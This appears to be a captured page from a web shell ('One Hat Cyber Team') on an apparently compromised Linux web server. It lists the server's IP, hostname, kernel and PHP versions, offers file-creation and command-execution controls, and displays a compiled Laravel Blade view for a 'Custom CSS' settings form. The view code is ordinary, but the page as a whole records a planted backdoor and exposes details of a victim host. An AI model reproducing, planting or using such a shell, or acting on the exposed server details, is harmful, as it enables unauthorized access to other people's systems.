⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.184
Server IP:
65.21.180.239
Server:
Linux gowhm.eplangoweb.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
eplangoweb
/
www
/
new
/
storage
/
framework
/
views
/
View File Name :
671064c15ff7ce20c50f902d1b8b41abb26bac95.php
<?php $__env->startSection('styles'); ?> <link rel="stylesheet" href="<?php echo e(asset('assets/admin/css/codemirror.css')); ?>"> <?php $__env->stopSection(); ?> <?php $__env->startSection('content'); ?> <div class="page-header"> <h4 class="page-title"><?php echo e(__('Custom CSS')); ?></h4> <ul class="breadcrumbs"> <li class="nav-home"> <a href="<?php echo e(route('user-dashboard')); ?>"> <i class="flaticon-home"></i> </a> </li> <li class="separator"> <i class="flaticon-right-arrow"></i> </li> <li class="nav-item"> <a href="#"><?php echo e(__('Settings')); ?></a> </li> <li class="separator"> <i class="flaticon-right-arrow"></i> </li> <li class="nav-item"> <a href="#"><?php echo e(__('Custom CSS')); ?></a> </li> </ul> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-title d-inline-block"><?php echo e(__('Custom CSS')); ?></div> </div> <div class="card-body"> <div class="alert-primary alert">Please do not use <strong class="text-danger"><style></style></strong> tag here. Put the CSS code only</div> <form action="<?php echo e(route('user.css.update')); ?>" id="cssForm" method="POST"> <?php echo csrf_field(); ?> <div class="row justify-content-center"> <div class="col-lg-12"> <div class="editor-holder"> <div class="scroller"> <textarea id="customCss" name="custom_css"><?php echo e($data->custom_css); ?></textarea> <pre><code class="syntax-highight html"></code></pre> </div> </div> </div> </div> </form> </div> <div class="card-footer"> <div class="form"> <div class="form-group from-show-notify row"> <div class="col-12 text-center"> <button type="submit" form="cssForm" class="btn btn-success"><?php echo e(__('Update')); ?></button> </div> </div> </div> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php $__env->startSection('scripts'); ?> <script src="<?php echo e(asset('assets/admin/js/plugin/codemirror/codemirror.js')); ?>"></script> <script src="<?php echo e(asset('assets/admin/js/plugin/codemirror/css.js')); ?>"></script> <script src="<?php echo e(asset('assets/admin/js/plugin/codemirror/show-hint.js')); ?>"></script> <script src="<?php echo e(asset('assets/admin/js/plugin/codemirror/css-hint.js')); ?>"></script> <script> (function($) { "use strict"; var editor = CodeMirror.fromTextArea(document.getElementById("customCss"), { lineNumbers: true, mode: "css", matchBrackets: true, theme: 'monokai', extraKeys: {"Ctrl-Space": "autocomplete"} }); })(jQuery); </script> <?php $__env->stopSection(); ?> <?php echo $__env->make('user.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eplangoweb/public_html/resources/views/user/settings/css.blade.php ENDPATH**/ ?>